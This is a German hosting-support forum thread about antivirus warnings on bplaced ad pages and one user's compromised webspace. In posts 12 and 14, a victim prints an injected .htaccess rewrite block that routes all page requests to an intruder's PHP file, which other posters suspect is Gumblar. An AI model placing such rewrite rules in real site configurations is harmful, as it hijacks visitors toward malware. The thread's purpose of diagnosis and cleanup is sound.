Virus

bplaced Allgemeiner Support
1

Ich bekomme gerade jedes Mal, wenn ich auf bplaced.net oder der Werbung auf den Error-Seiten gehe eine Virenmeldung von avast! rein.

2

gib mal bitte einen link bei dem du die meldung erhältst

3

wie gesagt, bplaced.net - direkt die Startseite. Und auf meiner Seite homepage-sk.bplaced.net auf einer Error Seite.

avast! sagt, der Virus komme von einer Seite auf ad.yieldmanager.com

4

hey also ich hab grad getestet.
bei mir läd er auch inhalt von der besagten seite, aber bei mir meldest kaspersky nichts
also kann ich leider nicht bestätigen
evtl ein fehlalarm

5

kann sein, müsste bei avast! liegen.

6

Hi,

Der verwendete Werbecode wird von Avast! als Fehler eingestuft, weil ein schädliches Script einen ähnlichen Algorythmus verwendet. Vor allem die Avast! Free-Version reagiert da sehr sensibel, da sich die Erkennungsstufe nur bedingt einstellen lässt.

7

Was für einen Virus meldet er denn? Wahrscheinlich handelt es sich um einen Heuristikfehler, denn es wird nicht nur nach definitiv bekannten Schädlingen gesucht, sondern auch bekannte Muster werden unter bestimmten Umständen als gefährlich eingestuft. Dass da mal ein Fehlalarm vorliegen kann, ist klar - besser, einmal zu viel gewarnt als einmal zu wenig.

Edit: Nein, ich entferne meinen Text jetzt nicht :p

8

Naja, solange nichts lebenswichtiges der Seite geblockt wird :stuck_out_tongue:

9

Nope es ist kein Fehlarlarm :wink:
Spybot z.B. schützt auch davor^^ Es ist zwar ansich nicht wirklich gefährlich (glaub ich), aber es ist Spyware bzw. nen Tracking Cookie.

Also sei froh das avast! davor schützt :wink: Ansonsten deaktiviere den Netzwerk schutz oder stelle diesen ein, ich für meinen Teil lasse das so, da ich auch keine Tracking Cookies brauchte :wink:
Gibt auch Guide’s zum loswerden :wink:
spywareremove.com/removeadyi … ercom.html

10

Hatte gleiches Problem.
Folgende fremde Datei war vorhanden:
PEF7C6ABEE4703.php
Habe die Datei gelöscht und auf meiner HP kam nur noch error 404.
Alles gelöscht und neu aufgespielt, ging eine Weile gut, doch dann tauchte die Datei
wieder auf.
Alle Dateien mit PHP-Code gelöscht, nun ist wieder alles OK.
Leider kann meine HP nicht mehr auf MySQL zugreifen.
Hat bplaced da eine PHP-Problem ???

11

Du meinst, die Datei war auf deinem Webspace? Dann geht da definitiv etwas nicht mit rechten Dingen zu. Wenn du die Datei 100%ig nicht selbst hochgeladen hast und auch eine andere PHP-Datei auf dem Webspace die Datei nicht angelegt hat, dann würde ich dir raten, alle deine Passwörter zu ändern.

12

Password habe ich auch schon geändert, finde
bloss nicht den Punkt fürs änders des FTP-passwortes.
ACHTUNG, noch eine Datei entdeckt: .htaccess
mit folgendem Inhalt:

#F7C6ABEE4703{
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !PE(.).php
RewriteRule (.).(php|html|htm|php3|phtml|shtml) PEF7C6ABEE4703.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
#F7C6ABEE4703}

auch gelöscht, mal sehen wie lange es nun gut geht.

13

Hi,
zum Ändern des FTP-Passworts lösche einfach den FTP-Zugang und lege einen neuen an. Dabei gehen selbstredend keine DAten verloren.

14

[quote=“eisschwimmer”]
#F7C6ABEE4703{
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !PE(.).php
RewriteRule (.).(php|html|htm|php3|phtml|shtml) PEF7C6ABEE4703.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
#F7C6ABEE4703}

auch gelöscht, mal sehen wie lange es nun gut geht.[/quote]

Seht so aus ob jemand die Besucher auf eine Seiten Locken will die vielleicht ein Virus enthält. (Die Datei “PEF7C6ABEE4703.php” bekommt jetzt jeden Besucher ab. Und das “php?%{QUERY_STRING}&qq=$1.$2” ist noch schöner…)

Sollte diese “PEF7C6ABEE4703.php” wieder auftauchen oder wieder so eine PHP-Datei erstellt werden, Poste uns mal den Inhalt.

Seht irgend wie wieder nach ner Version von Gumblar aus…zwar Verschlüsselt der was gerne aber wenn die Datei PEF7C6ABEE4703.php einen Code wie bei viewtopic.php?f=10&t=12697&p=278705 enthält könnte es durch aus Gumblar sein. - Es muss nicht Gumblar sein, es könnte auch etwas anderes sein. Würde mal einen Virus Check durchführen.
kaspersky.com/de/news?id=207566269
en.wikipedia.org/wiki/Gumblar

viewtopic.php?f=6&t=13357&p=286412
viewtopic.php?f=10&t=12697&p=278705

15

[quote=“White-Tiger”]Nope es ist kein Fehlarlarm :wink:
Spybot z.B. schützt auch davor^^ Es ist zwar ansich nicht wirklich gefährlich (glaub ich), aber es ist Spyware bzw. nen Tracking Cookie.

Also sei froh das avast! davor schützt :wink: Ansonsten deaktiviere den Netzwerk schutz oder stelle diesen ein, ich für meinen Teil lasse das so, da ich auch keine Tracking Cookies brauchte :wink:
Gibt auch Guide’s zum loswerden :wink:
spywareremove.com/removeadyi … ercom.html[/quote]
Ein AntiVirus sollte nicht auf Tracing-Cookies reagieren, schließlich verwendet jedes größere Netzwerk diese (Google, Facebook, jegliche Werbeanbieter, …)

16

ist halt kein 08/15 AntiVirus sondern hat sogar nen Schutz vor Spyware :wink: Wie gesagt… wer gerne Spyware hat soll den Schutz davor eben abstellen^^
[size=85](Nebenbei… die Seite kann natürlich geladen werden… es wird nur am unteren Rand ne Meldung angezeigt die nicht weiter stört und beim anklicken oder nach kurzer Zeit wieder weg ist)[/size]

17

ich hab jetz gemerkt dass in letzter zeit sehr viele virus meldungen kommen von avira
ich hab das jetz schon mehr als 10 mal in der stunden in quarantäne verschoben und von dort dann gelöscht :frowning:
hier ein screenshot: achja das is immer die gleiche werbung :wink: :

18

hi,

wie da steht und gesagt, es ist ein heuristischer Alarm, der durch Übereinstimmung mit gewissen Mustern ausgelöst wurde. Ich würde mal die Datei nicht direkt löschen, sondern zur Untersuchen an Avira senden.

lg

19

Junge soll man lehren, Alte ehren, Weise fragen, Narren ertragen… :unamused:

20

habs hingeschickt
immerhin bekomm ich sowas alle paar minuten